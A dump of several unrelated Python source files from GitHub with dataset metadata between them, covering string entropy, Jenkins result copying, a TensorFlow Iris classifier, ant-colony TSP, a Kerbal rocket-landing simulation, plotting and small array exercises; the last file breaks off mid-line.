Source: https://github.com/creyD/entro.py/blob/ab61e24d67ef2cdb0f50f3a814c5be04a8238d05/entro.py\n\nimport math\nimport argparse\n\n\n# Calculates the entropy of a given string (as described in the docstring)\ndef calcEntropy(string):\n alphabet, alphabet_size, entropy = {}, 0, 0\n\n for char in string:\n if char in alphabet:\n alphabet[char] += 1\n else:\n alphabet[char] = 1\n alphabet_size += 1\n\n for char in alphabet:\n alphabet[char] = alphabet[char] / alphabet_size\n entropy += alphabet[char] * math.log(alphabet[char], 2)\n\n return -entropy, alphabet\n\n# Calculates the entropy of a given string and returns only its entropy (as measured in bits)\ndef getEntropy(string):\n alphabet, alphabet_size, entropy = {}, 0, 0\n\n for char in string:\n if char in alphabet:\n alphabet[char] += 1\n else:\n alphabet[char] = 1\n alphabet_size += 1\n\n for char in alphabet:\n alphabet[char] = alphabet[char] / alphabet_size\n entropy += alphabet[char] * math.log(alphabet[char], 2)\n\n return -entropy\n\n# Outputs a given entropy including the original text and the alphabet with probabilities\ndef printEntropy(original, entropy, alphabet, simple):\n print('---')\n if simple == False:\n print('Content: ' + original)\n print('Probabilities: ' + str(alphabet))\n print('Entropy: ' + str(entropy) + ' bits')\n print('---')\n\n\n# Reads a file by a given path\ndef getFile(path):\n f = open(path, 'r')\n content = f.read().replace('\\n', ' ')\n f.close()\n return content.strip()\n\n\n# List of the arguments one can use to influence the behavior of the program\nparser = argparse.ArgumentParser(description='Calculate the information entropy of some strings.')\n\n# INPUT ARGUMENTS\nparser.add_argument('strings', nargs='*', default='', type=str, help='Strings to calculate the entropy of.')\nparser.add_argument('--files', nargs='*', type=str, default='', help='Provide file path(s) to calculate the entropy of.')\n\n# OUTPUT OPTIONS\nparser.add_argument('--simple', nargs='?', type=bool, default=False, help='Determines the explicitness of the output. (True = only entropy shown)')\n\n# CONVERT OPTIONS\nparser.add_argument('--lower', nargs='?', type=bool, default=False, help='Converts given strings or textfiles to lowercase before calculating.')\nparser.add_argument('--upper', nargs='?', type=bool, default=False, help='Converts given strings or textfiles to uppercase before calculating.')\nparser.add_argument('--squash', nargs='?', type=bool, default=False, help='Removes all whitespaces before calculating.')\nargs, unknown = parser.parse_known_args()\n\n# Prepares the queue of different strings\nqueue = []\n\n# Add all the provided strings to the list\nfor string in args.strings:\n queue.append(string)\n\n# Add all the provided files to the list\nfor file in args.files:\n string = getFile(file)\n queue.append(string)\n\n# Interates over the collected strings and prints the entropies\nfor string in queue:\n if args.lower != False:\n string = string.lower()\n elif args.upper != False:\n string = string.upper()\n\n if args.squash != False:\n string = string.replace(\" \", \"\")\n\n a, b = calcEntropy(string)\n printEntropy(string, a, b, args.simple)\n\n# Calculating the conditional entropy of a text\n# Source: http://datasciencepadawan.blogspot.com/2015/03/computing-text-conditional-entropy-with.html?m=1\n\ndef ngram_list(text, n):\n ngram = []\n count = 0\n for token in text[:len(text)-n+1]:\n ngram.append(text[count:count+n])\n count = count + 1\n return ngram\n\ndef ngram_counts(text, n):\n ngram_dict = {}\n ngram_arr = ngram_list(text, n)\n\n for item in ngram_arr:\n ngram_dict[' '.join(item)] = (ngram_dict[' '.join(item)] + 1) if ' '.join(item) in ngram_dict else 1\n return ngram_dict\n\ndef conditional_entropy(data):\n unigram = ngram_counts(data, 1)\n bigram = ngram_counts(data, 2)\n N = sum(unigram.values())\n H = 0\n\n for key in bigram.keys():\n H -= bigram[key] / (1.0 * N) * math.log(bigram[key] / (1.0 * unigram[key.split(' ')[1]]), 2)\n return H\n\ndef experimental_entropy(data):\n unigram = ngram_counts(data, 2)\n bigram = ngram_counts(data, 3)\n N = sum(unigram.values())\n H = 0\n\n for key in bigram.keys():\n H -= bigram[key] / (1.0 * N) * math.log(bigram[key] / (1.0 * unigram[key.split(' ')[1]]), 2)\n return H\n\ndef test():\n print(\"pls work\")","repo_name":"katielin019/bubbles_final_paper","sub_path":"scripts/entro.py","file_name":"entro.py","file_ext":"py","file_size_in_byte":4715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42254484421","text":"#!/usr/bin/env python3\n\nimport os\nimport subprocess\nimport sys\nimport pathlib\n\nprint ('Number of arguments:', len(sys.argv))\nprint ('Argument List:', str(sys.argv))\n\nif len(sys.argv) < 3:\n\tsys.exit(-1)\n\njenkins_workspace = sys.argv[1]\ntbot_path = sys.argv[2]\n\nprename = \"raspi-bbb\"\nwp = \"/home/hs/src/bbb/tbot-tbot2go\"\nres_path = \"results\"\n\n# generate junit file\nres = subprocess.run([f\"{wp}/generate_all.sh\", tbot_path], stdout=subprocess.PIPE)\n# get log number\nlogs = list(pathlib.Path(\"results/junit\").glob(f\"{prename}-*.xml\"))\nlogs.sort()\nlog = logs[-1]\nlog = str(log)\nnumber = log.split(\"-\")[2]\nnumber = number.split(\".\")[0]\nname = f\"{prename}-{number}\"\nres = subprocess.run([\"cp\", f\"results/junit/{name}.xml\", jenkins_workspace + \"/tbot_results.xml\"], stdout=subprocess.PIPE)\n\n# setup subdir for tbot results\nclassname = \"\"\nwith open(jenkins_workspace + \"/tbot_results.xml\", \"r\") as f:\n for line in f:\n if \"classname=\" in line:\n line = line.split('\"')\n classname = line[1]\n break\n\nif classname == \"\":\n print(\"Could not detect classname\")\n sys.exit(-1)\n\nclassname = \"tbot_results\"\njenkins_workspace_tbot = jenkins_workspace + \"/\" + classname\nres = subprocess.run([\"mkdir\", \"-p\", jenkins_workspace_tbot], stdout=subprocess.PIPE)\n\n# cp dot results\nsubdirname = \"dot\"\ntmpp = f\"{res_path}/{subdirname}\"\nres = subprocess.run([\"test\", \"-f\", f\"{tmpp}/{name}.jpg\"], stdout=subprocess.PIPE)\nif res.returncode == 0:\n res = subprocess.run([\"cp\", f\"{tmpp}/{name}.dot\", f\"{jenkins_workspace_tbot}\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/{name}.jpg\", f\"{jenkins_workspace_tbot}/graph.jpg\"], stdout=subprocess.PIPE)\nelse:\n res = subprocess.run([\"echo\", f\" RES {res}\"], stdout=subprocess.PIPE)\n\n# cp html results\nsubdirname = \"html\"\ntmpp = f\"{res_path}/{subdirname}\"\nres = subprocess.run([\"test\", \"-f\", f\"{tmpp}/{name}.html\"], stdout=subprocess.PIPE)\nif res.returncode == 0:\n res = subprocess.run([\"cp\", f\"{tmpp}/myscript.js\", f\"{jenkins_workspace_tbot}\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/{name}.html\", f\"{jenkins_workspace_tbot}\"], stdout=subprocess.PIPE)\nelse:\n res = subprocess.run([\"echo\", f\" RES {res}\"], stdout=subprocess.PIPE)\n\n# cp statistic\nsubdirname = \"stats\"\ntmpp = f\"{res_path}/{subdirname}\"\nres = subprocess.run([\"test\", \"-f\", f\"{tmpp}/{name}.jpg\"], stdout=subprocess.PIPE)\nif res.returncode == 0:\n res = subprocess.run([\"cp\", f\"{tmpp}/balkenplot.sem\", f\"{jenkins_workspace_tbot}\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/{name}.jpg\", f\"{jenkins_workspace_tbot}/statistic.jpg\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/{name}.txt\", f\"{jenkins_workspace_tbot}/statistic_data.txt\"], stdout=subprocess.PIPE)\nelse:\n res = subprocess.run([\"echo\", f\" RES {res}\"], stdout=subprocess.PIPE)\n\n# cp ptest\nsubdirname = \"ptest\"\ntmpp = f\"{res_path}/{subdirname}\"\nres = subprocess.run([\"test\", \"-f\", f\"{tmpp}/{name}.jpg\"], stdout=subprocess.PIPE)\nif res.returncode == 0:\n res = subprocess.run([\"cp\", f\"{tmpp}/{name}.jpg\", f\"{jenkins_workspace_tbot}/ptest.jpg\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/{name}.txt\", f\"{jenkins_workspace_tbot}/ptest_data.txt\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/balkenplot.sem\", f\"{jenkins_workspace_tbot}/balkenplot_ptest.sem\"], stdout=subprocess.PIPE)\nelse:\n res = subprocess.run([\"echo\", f\" RES {res}\"], stdout=subprocess.PIPE)\n\n# iperf ptest\nsubdirname = \"iperf\"\ntmpp = f\"{res_path}/{subdirname}\"\nres = subprocess.run([\"test\", \"-f\", f\"{tmpp}/iperf.jpg\"], stdout=subprocess.PIPE)\nif res.returncode == 0:\n res = subprocess.run([\"cp\", f\"{tmpp}/iperf.jpg\", f\"{jenkins_workspace_tbot}/iperf.jpg\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/iperf.dat\", f\"{jenkins_workspace_tbot}/iperf_data.txt\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/balkenplot_iperf.sem\", f\"{jenkins_workspace_tbot}/balkenplot_iperf.sem\"], stdout=subprocess.PIPE)\nelse:\n res = subprocess.run([\"echo\", f\" RES {res}\"], stdout=subprocess.PIPE)\n\n# latency ptest\nsubdirname = \"latency\"\ntmpp = f\"{res_path}/{subdirname}\"\nres = subprocess.run([\"test\", \"-f\", f\"{tmpp}/latency.jpg\"], stdout=subprocess.PIPE)\nif res.returncode == 0:\n res = subprocess.run([\"cp\", f\"{tmpp}/latency.jpg\", f\"{jenkins_workspace_tbot}/latency.jpg\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/latency.dat\", f\"{jenkins_workspace_tbot}/latency_data.txt\"], stdout=subprocess.PIPE)\n res = subprocess.run([\"cp\", f\"{tmpp}/balkenplot.sem\", f\"{jenkins_workspace_tbot}/balkenplot_latency.sem\"], stdout=subprocess.PIPE)\nelse:\n res = subprocess.run([\"echo\", f\" RES {res}\"], stdout=subprocess.PIPE)\n","repo_name":"EmbLux-Kft/tbot-tbot2go","sub_path":"generate_jenkins_result.py","file_name":"generate_jenkins_result.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24001626616","text":"import tensorflow as tf\nimport os\nfrom tensorflow.keras.layers import Layer\n\ntrain_dataset_url = 'https://storage.googleapis.com/download.tensorflow.org/data/iris_training.csv';\n\ntrain_dataset_raw = tf.keras.utils.get_file(fname = os.path.basename((train_dataset_url)), origin = train_dataset_url)\n\ncolumn_names = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'species']\n\nfeature_names = column_names[:-1]\nlabel_name = column_names[-1]\n\nclass_names = ['Iris setosa', 'Iris versicolor', 'Iris virginica']\n\nbatch_size = 32\n\ntrain_dataset = tf.data.experimental.make_csv_dataset(train_dataset_raw, batch_size, column_names=column_names, label_name=label_name, num_epochs=1)\n\n\ndef pack_features_vector(features, labels):\n features = tf.stack(list(features.values()), axis = 1)\n return features, labels\n\ntrain_dataset = train_dataset.map(pack_features_vector)\n\nfeatures, labels = next(iter(train_dataset))\n# print(features)\n\nclass MyCustomLayer(Layer):\n def __init__(self, units=128, initializer='glorot_uniform', activation=None, name=None, **kwargs):\n super(MyCustomLayer, self).__init__(**kwargs)\n self.units = units\n self.initializer = initializer\n self.activation = activation\n if name:\n self._name = name\n def build(self, input_shape):\n self.w = self.add_weight(shape=(input_shape[-1], self.units), initializer=self.initializer, trainable=True)\n self.b = self.add_weight(shape=(self.units, ), initializer=self.initializer, trainable=True)\n def call(self, input_tensor):\n # result = tf.matmul(input_tensor, self.w) + self.b\n result = input_tensor @ self.w + self.b\n if (self.activation):\n result = self.activation(result)\n return result\n\nmodel = tf.keras.Sequential([\n tf.keras.layers.Dense(10, activation=tf.nn.relu, input_shape=(4, )),\n MyCustomLayer(10, activation=tf.nn.relu),\n tf.keras.layers.Dense(3)\n])\n\npredictions = model(features)\n\nloss_object = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)\n\ndef loss(model, x, y, training):\n predicted = model(x, training=training)\n return loss_object(y_true=y, y_pred=predicted)\n\ndef grad(model, inputs, targets):\n with tf.GradientTape() as tape:\n loss_value = loss(model, inputs, targets, training=True)\n return loss_value, tape.gradient(loss_value, model.trainable_variables)\n\noptimizer = tf.keras.optimizers.SGD(learning_rate=0.01)\nloss_value, grads = grad(model, features, labels)\n\noptimizer.apply_gradients(zip(grads, model.trainable_variables))\n\nEPOCHS=100\n\ntrain_loss_results = []\ntrain_accuracy_results = []\n\nfor epoch in range(EPOCHS):\n epoch_average_loss = tf.keras.metrics.Mean()\n epoch_accuracy = tf.keras.metrics.SparseCategoricalAccuracy()\n for (x, y) in train_dataset:\n loss_value, grads = grad(model, x, y)\n optimizer.apply_gradients(zip(grads, model.trainable_variables))\n epoch_average_loss.update_state(loss_value)\n epoch_accuracy.update_state(y, model(x, training=True))\n print(\"Epoch {epoch} | Loss: | {loss} | Accuracy: {accuracy}\".format(epoch=epoch, loss=epoch_average_loss.result(), accuracy=epoch_accuracy.result()))\n train_loss_results.append(epoch_average_loss.result())\n train_accuracy_results.append(epoch_accuracy.result())","repo_name":"hypothetical-andrei/wmda-pub-assets","sub_path":"c6/tf-nn4.py","file_name":"tf-nn4.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"13300854986","text":"from math import sqrt\nfrom random import randint, random\n\nants_number = 50\niterations = 1000\nartificial_pheromone = 1.0\nevaporation_rate = 0.1\nQ = 1.0\nalpha = 1.0\n\nBays29 = [\n [1, 1150.0, 1760.0],\n [2, 630.0, 1660.0],\n [3, 40.0, 2090.0],\n [4, 750.0, 1100.0],\n [5, 750.0, 2030.0],\n [6, 1030.0, 2070.0],\n [7, 1650.0, 650.0],\n [8, 1490.0, 1630.0],\n [9, 790.0, 2260.0],\n [10, 710.0, 1310.0],\n [11, 840.0, 550.0],\n [12, 1170.0, 2300.0],\n [13, 970.0, 1340.0],\n [14, 510.0, 700.0],\n [15, 750.0, 900.0],\n [16, 1280.0, 1200.0],\n [17, 230.0, 590.0],\n [18, 460.0, 860.0],\n [19, 1040.0, 950.0],\n [20, 590.0, 1390.0],\n [21, 830.0, 1770.0],\n [22, 490.0, 500.0],\n [23, 1840.0, 1240.0],\n [24, 1260.0, 1500.0],\n [25, 1280.0, 790.0],\n [26, 490.0, 2130.0],\n [27, 1460.0, 1420.0],\n [28, 1260.0, 1910.0],\n [29, 360.0, 1980.0]\n]\n\ndef _distance(n1, n2):\n dx = n1[1] - n2[1]\n dy = n1[2] - n2[2]\n return sqrt(dx * dx + dy * dy)\n\ndistances = [[] for _ in range(len(Bays29))]\npheromones = [[] for _ in range(len(Bays29))]\nants = [{} for _ in range(ants_number)]\n\nfor i in range(len(Bays29)):\n for j in range(i):\n distances[i].append(_distance(Bays29[i], Bays29[j]))\n pheromones[i].append(artificial_pheromone)\n\ndef get_distance(n1, n2):\n if n1 < n2:\n return distances[n2][n1]\n return distances[n1][n2]\n\ndef get_pheromones(n1, n2):\n if n1 < n2:\n return pheromones[n2][n1]\n return pheromones[n1][n2]\n\ndef set_pheromones(n1, n2, value):\n if n1 < n2:\n pheromones[n2][n1] = value\n else:\n pheromones[n1][n2] = value\n\ndef get_cost(tour):\n cost = 0\n for i in range(len(tour)):\n cost += get_distance(tour[i - 1], tour[i])\n return cost\n\nfor ant in ants:\n ant['edge'] = randint(0, len(Bays29) - 1)\n ant['tabu'] = []\n\nbest_tour = [i for i in range(len(Bays29))]\nbest_tour_cost = get_cost(best_tour)\n\nfor iter in range(iterations):\n for ant in ants:\n while True:\n pvalues = [[i, get_pheromones(ant['edge'], i)**alpha] for i in range(len(Bays29)) if i not in ant['tabu'] and i != ant['edge']]\n\n if len(pvalues) == 0:\n ant['tabu'].append(ant['edge'])\n cost = get_cost(ant['tabu'])\n if cost < best_tour_cost:\n best_tour = ant['tabu']\n best_tour_cost = cost\n print(iter, cost, best_tour, flush=True)\n ant['tabu'] = []\n break\n\n total_pheromones = 0.0\n for value in pvalues:\n total_pheromones += value[1]\n\n rand = random()\n total = 0\n for i in range(len(pvalues)):\n total += pvalues[i][1] / total_pheromones\n if total >= rand:\n break\n ant['tabu'].append(ant['edge'])\n ant['edge'] = pvalues[i][0]\n\n # online pheromone update rules\n #n1, n2 = ant['tabu'][-1], ant['edge']\n #pvalue = get_pheromones(n1, n2)\n #set_pheromones(n1, n2, pvalue + Q / get_distance(n1, n2))\n\n # evaporate pheromones\n pheromones = [[(1 - evaporation_rate) * pvalue for pvalue in plist] for plist in pheromones]\n # offline pheromone update rules\n for i in range(len(best_tour)):\n n1, n2 = best_tour[i - 1], best_tour[i]\n pvalue = get_pheromones(n1, n2)\n set_pheromones(n1, n2, pvalue * (1 - evaporation_rate) + evaporation_rate * max(max(p) for p in pheromones if p))\n","repo_name":"tcooc/adaptive4","sub_path":"py/aco.py","file_name":"aco.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36877532199","text":"#!/usr/bin/python3.5\n#RK4 flight integration\n\nfrom math import *\n\n#useful constants\nKerbinMu = 3.5316e12 #gravitational parameter\nKerbinR = 6e5\nKerbinDay = 21549.425\nKerbing0 = KerbinMu/KerbinR**2\nKerbinAtm = 101.325\nKerbinAtmScale1 = 6930.5\nKerbinAtmScale2 = 20240.0\n\nclass Engine:\n def __init__(self, vacIsp, slIsp, maxthrustvac):\n self.ispv = vacIsp\n self.isps = slIsp\n self.maxff = maxthrustvac/vacIsp/Kerbing0\n\n def thrust(self, press = 0, thrustlevel = 1.0, thrustlim = 1.0):\n if press > 0:\n return Kerbing0*thrustlevel*thrustlim*self.maxff*(self.ispv + (self.isps-self.ispv)*press/KerbinAtm)\n else:\n return Kerbing0*thrustlevel*thrustlim*self.maxff*self.ispv\n\nclass EngineMount:\n def __init__(self, Engn, attAngle, thrustlim = 1.0):\n \"Input attAngle in deg, self.angle in radians\"\n self.engine = Engn\n self.angle = attAngle/180.0*3.1415927\n self.englimit = thrustlim\n\nEngineDic = {'Reliant': Engine(310,265,240e3), 'Swivel': Engine(320,250,215e3), 'Thud': Engine(305,275,120e3), 'Spark': Engine(320,270,20e3), 'Twitch': Engine(290,250,16e3), 'Terrier': Engine(345,85,60e3), 'Vector': Engine(315,295,1.0e6), 'Skipper': Engine(320,280,650e3), 'Mainsail': Engine(310,285,1.5e6), 'TwinBoar': Engine(300,280,2.0e6), 'Poodle': Engine(350,90,250e3), 'Rhino': Engine(340,205,2.0e6), 'Mammoth': Engine(315,295,4.0e6), 'VestaVR1': Engine(335,260,90e3)}\n\ndef KerbinGravConst(h,lat=0):\n \"Calculate gravity acceleration at Kerbin, height h in meters, latitude in degrees\"\n return KerbinMu/(KerbinR+h)**2 - (2*3.1415927/KerbinDay)**2*KerbinR*cos(lat/180.0*3.1415927)\n\ndef KerbinPressure(h):\n if h < 70000:\n return KerbinAtm*exp(-h/KerbinAtmScale1 - (h/KerbinAtmScale2)**2)\n else:\n return 0\n\ndef DragForce(p, v, dragcoeff):\n return dragcoeff*p*29/305/8.314*v**2/2\n\t\ndef VesselMass(mwet,mdry,fuelflow,t):\n return max(mdry,mwet-fuelflow*t)\n \ndef TotalThrust(EngMntList,press,thrustlevel = 1.0):\n \"First output value is thrust in Newtons, second is effective Isp in seconds\"\n sumthrust = 0\n sumff = 0\n for em in EngMntList:\n sumthrust += em.engine.thrust(press, thrustlevel, em.englimit)*cos(em.angle)\n sumff += em.engine.maxff * thrustlevel\n return [ sumthrust, sumthrust/sumff/Kerbing0 ]\n\ndef dvexdh(EngMntList, hasl, press, pressasl):\n \"Returns du/dh at height Hasl above sea level\"\n if press == 0:\n return 0\n hscale = hasl/log(pressasl/press) #assuming p=p0exp(-h/hscale)\n vexh = TotalThrust(EngMntList, press)[1]\n vexsl = TotalThrust(EngMntList, pressasl)[1]\n dvexdp = (vexh - vexsl)/(press - pressasl)*Kerbing0\n \n return -press/hscale*dvexdp\n\ndef intlog(x):\n \"Returns indefinite integral of ln(x)\"\n return x*(log(x) - 1)\n \ndef RK4integrate(h0, v0, mwet, mdry, dragcoeff, dt, maxtime, enginelist, thrustlevel, lat=0, fn=\"log\", OutputAsCSV=False):\n if OutputAsCSV:\n filesuffix = \".csv\"\n delimiter = \"; \"\n else:\n filesuffix = \".txt\"\n delimiter = \" \" \n mass = mwet\n tt = 0\n h1 = h0\n v1 = v0\n \n dgdh = -2*KerbinMu/(KerbinR + h0)**3 #gradient of free fall acceleration\n thrustisp = TotalThrust(enginelist, KerbinPressure(h0), thrustlevel)\n effthrust = thrustisp[0]\n exhvel = thrustisp[1]*Kerbing0\n fuelflow = effthrust/exhvel\n tburn = (mwet-mdry)/fuelflow\n \n drag = DragForce(KerbinPressure(h0), v0, dragcoeff)\n geff = KerbinGravConst(h0,lat) - drag/(3*mass)\n maxa = effthrust/mass\n dudh = dvexdh(enginelist, h0, KerbinPressure(h0), KerbinAtm)\n\n v_lin_term = maxa - geff\n v_sq_term = maxa**2/(exhvel*2) + 1.0/6.0*fuelflow/mass*dudh*v0 - dgdh*v0 / 3.0\n \n print(repr(dgdh))\n\n ts = (-v_lin_term + sqrt( v_lin_term**2 - 4*v0*v_sq_term ) ) / (2*v_sq_term)\n \n #dv/dt = (v_e[0] + v_e[1]t + v_e[2]t^2)/(v_d - t) + A*(v0 - v0/ts*t)^2 - (g + dg/dh*v0*t - v0/ts*dg/dh*t^2/2)\n v_e = [ exhvel, dudh*v0, -dudh*v0/(2*ts) ]\n v_d = mass/fuelflow\n \n dv_frac_const = -(v_e[1] + v_e[2]*v_d)\n dv_frac_lin = -v_e[2] - dgdh*v0\n dv_frac_e = v_e[0] - v_d * dv_frac_const\n \n hs = -v0*ts + (KerbinGravConst(h0,lat) - drag/(2*mass) - dv_frac_const)*ts**2/2 - dv_frac_e * v_d *(1 + intlog(1 - ts/v_d)) - dv_frac_lin/6*ts**3\n \n outfile = open(fn+filesuffix,\"wt\")\n \n outfile.write(\"Guess of t_s, h_s:\\n\")\n outfile.write(\"t_s = \" + '{0:.2f}'.format(ts) + \" s\" + delimiter + \"h_s = \" + '{0:.1f}'.format(hs) + \" m\\n\")\n \n outfile.write(\"Time,s\" + delimiter + \"Distance traveled\" + delimiter + \" H, m\" + delimiter + \"VSpeed, m/s\" + delimiter + \"Isp, s\\n\")\n \n while (tt <= maxtime) and (v1 < 0):\n outfile.write('{0:.3f}'.format(tt) + delimiter + '{}'.format(h0-h1) + delimiter + '{}'.format(h1) + delimiter + '{}'.format(v1) + delimiter + repr(TotalThrust(enginelist, KerbinPressure(h1))[1]) + \"\\n\")\n\t\t\n k1a = (TotalThrust(enginelist, KerbinPressure(h1), thrustlevel)[0]*max(0,copysign(1,tburn-tt)) - DragForce(KerbinPressure(h1), v1, dragcoeff)*copysign(1,v1))/VesselMass(mwet,mdry,fuelflow,tt) - KerbinGravConst(h1,lat)\n k1v = v1\n \n h2 = h1 + k1v*dt*0.5\n v2 = v1 + k1a*dt*0.5\n \n k2a = (TotalThrust(enginelist, KerbinPressure(h2), thrustlevel)[0]*max(0,copysign(1,tburn-tt-dt*0.5)) - DragForce(KerbinPressure(h2), v2, dragcoeff)*copysign(1,v2))/VesselMass(mwet,mdry,fuelflow,tt+dt*0.5) - KerbinGravConst(h2,lat)\n k2v = v2\n \n h3 = h1 + k2v*dt*0.5\n v3 = v1 + k2a*dt*0.5\n \n k3a = (TotalThrust(enginelist, KerbinPressure(h3), thrustlevel)[0]*max(0,copysign(1,tburn-tt-dt*0.5)) - DragForce(KerbinPressure(h3), v3, dragcoeff)*copysign(1,v3))/VesselMass(mwet,mdry,fuelflow,tt+dt*0.5) - KerbinGravConst(h3,lat)\n k3v = v3\n \n h4 = h1 + k3v*dt\n v4 = v1 + k3a*dt\n \n k4a = (TotalThrust(enginelist, KerbinPressure(h4), thrustlevel)[0]*max(0,copysign(1,tburn-tt-dt)) - DragForce(KerbinPressure(h4), v4, dragcoeff)*copysign(1,v4))/VesselMass(mwet,mdry,fuelflow,tt+dt) - KerbinGravConst(h4,lat)\n k4v = v4\n \n h1 = h1 + dt/6.0*(k1v+2*k2v+2*k3v+k4v)\n v1 = v1 + dt/6.0*(k1a+2*k2a+2*k3a+k4a)\n \n tt=tt+dt\n \n outfile.close()\n return 0\n\nEngineList = [EngineMount(EngineDic['Thud'],22.0719225), EngineMount(EngineDic['Thud'],22.0719225), EngineMount(EngineDic['Thud'],22.0719225), EngineMount(EngineDic['Thud'],22.0719225)]\n\nUserThrustLevel = 0.75\nInitialHeight = 3500 #above sea level\nInitialVspeed = -60\nInitialMass = 23000\nDryMass = 15800\nDragArea = 9.8\nTimestep = 0.01\nMaxIntegrationTime = 1000\nInitLatitude = 90\n\nLogFile = \"droplog_1_\" + '{0:.0f}'.format(InitialHeight) + \"_\" + '{0:.0f}'.format(-InitialVspeed)\n\nRK4integrate(InitialHeight, InitialVspeed, InitialMass, DryMass, DragArea, Timestep, MaxIntegrationTime, EngineList, UserThrustLevel, InitLatitude, LogFile,True)\n","repo_name":"pand5461/Droptest","sub_path":"droptest_betterispacc.py","file_name":"droptest_betterispacc.py","file_ext":"py","file_size_in_byte":6624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20522084667","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@version: Python 2.7.6 on win10(64)\n@author: BingZhen Zhou\n@contact: 953129171@qq.com\n@file name: fancself\n@time: 2018/7/7 9:07\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfigheight = 8\nfig = plt.figure(2, figsize=(9, figheight), dpi=80, facecolor=\"white\")\nfontsize = 0.4 * fig.dpi\nax = fig.add_subplot(111, frameon=False, xticks=[], yticks=[])\nstylename = \"square\"\n# ax.text(2, 2.5, stylename+\"hhhhhhhhhhhh$\\sum_{k=0}^n$\" ,ha=\"center\",\n# size=fontsize,\n# # transform=ax.transAxes,\n# bbox=dict(boxstyle=stylename, fc=\"w\", ec=\"k\"))\nax.annotate('$\\sum_{k=0}^x$', (1, 1), (300, 300),\n xycoords='data',size=fontsize,\n textcoords='offset points',\n bbox=dict(boxstyle=\"round\", fc=\"1\"),\n arrowprops=dict(arrowstyle=\"->\",\n connectionstyle=\"angle,angleA=90,angleB=0,rad=10\"))\n\nax.annotate( '$\\sum_{k=0}^n$',\n xytext=(-300, -300), xycoords='data',size=fontsize,\n xy=(4.1, 4.4), textcoords='offset points',\n bbox=dict(boxstyle=\"round4\", fc=\"1\"),\n arrowprops=dict(arrowstyle=\"->\",\n connectionstyle=\"angle,angleA=90,angleB=0,rad=10\"))\nax.set(xlim=(0, 5), ylim=(0, 5))\n# c = plt.Circle((0.5,0.5), 1)\n# ax.plot(c)\nax.set_aspect('equal', 'box')\n# x = np.linspace(0,np.pi,30)\n# ax.plot(x, np.sin(x))\n# ax.plot([0.1,0.3],[0.2,0.4])\nplt.show()","repo_name":"zbzhen/PycharmProjects","sub_path":"matplotlibex/fancself.py","file_name":"fancself.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15990620889","text":"\ndef spiral_order(mat):\n i, j = 0, 0\n\n N = len(mat) * len(mat[0])\n visited = [[False for i in range(len(mat[0]))] for j in range(len(mat))]\n ans = [mat[i][j]]\n\n count = 1\n visited[i][j] = True\n\n while count < N:\n while j+1 < len(mat[0]) and not visited[i][j+1]:\n j += 1\n ans.append(mat[i][j])\n visited[i][j] = True\n count += 1\n while i+1 < len(mat) and not visited[i+1][j]:\n i += 1\n ans.append(mat[i][j])\n visited[i][j] = True\n count += 1\n while j-1 >= 0 and not visited[i][j-1]:\n j -= 1\n ans.append(mat[i][j])\n visited[i][j] = True\n count += 1\n while i-1 >= 0 and not visited[i-1][j]:\n i -= 1\n ans.append(mat[i][j])\n visited[i][j] = True\n count += 1\n return ans\n\n\nif __name__==\"__main__\":\n # matrix = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n matrix = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n output = spiral_order(matrix)\n print(output)","repo_name":"thenakulchawla/ubiquitous-barnacle","sub_path":"arrays/spiral_matrix.py","file_name":"spiral_matrix.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2557506021","text":"N = int(input('N = '))\n\n\n\"\"\"\n# while statement\n\ni = 1\nsum = 0\nwhile (i <= N):\n sum += i\n i += 1\n\nprint(sum)\n\"\"\"\n\n# for statement\n\nsum = 0\nfor i in range(1, N + 1):\n sum += i\n\nprint(sum)","repo_name":"BLINK-ONCE/Storage","sub_path":"python/python study/act 1/while for 프로그래밍 연습(1).py","file_name":"while for 프로그래밍 연습(1).py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29379878119","text":"def ss(s,n):\n a = []\n for i in range(len(s)):\n if s[i:n+i] not in a and len(s[i:n+i]) == n:\n c = s.count(s[i:n+i])\n if c <= 1:\n a.append(s[i:n+i])\n if a.count('AAA') == 1:\n a = []\n if len(a) > 0:\n for i in a:\n print(i)\n else:\n print('ninguna')\n\ns = input()\nn = 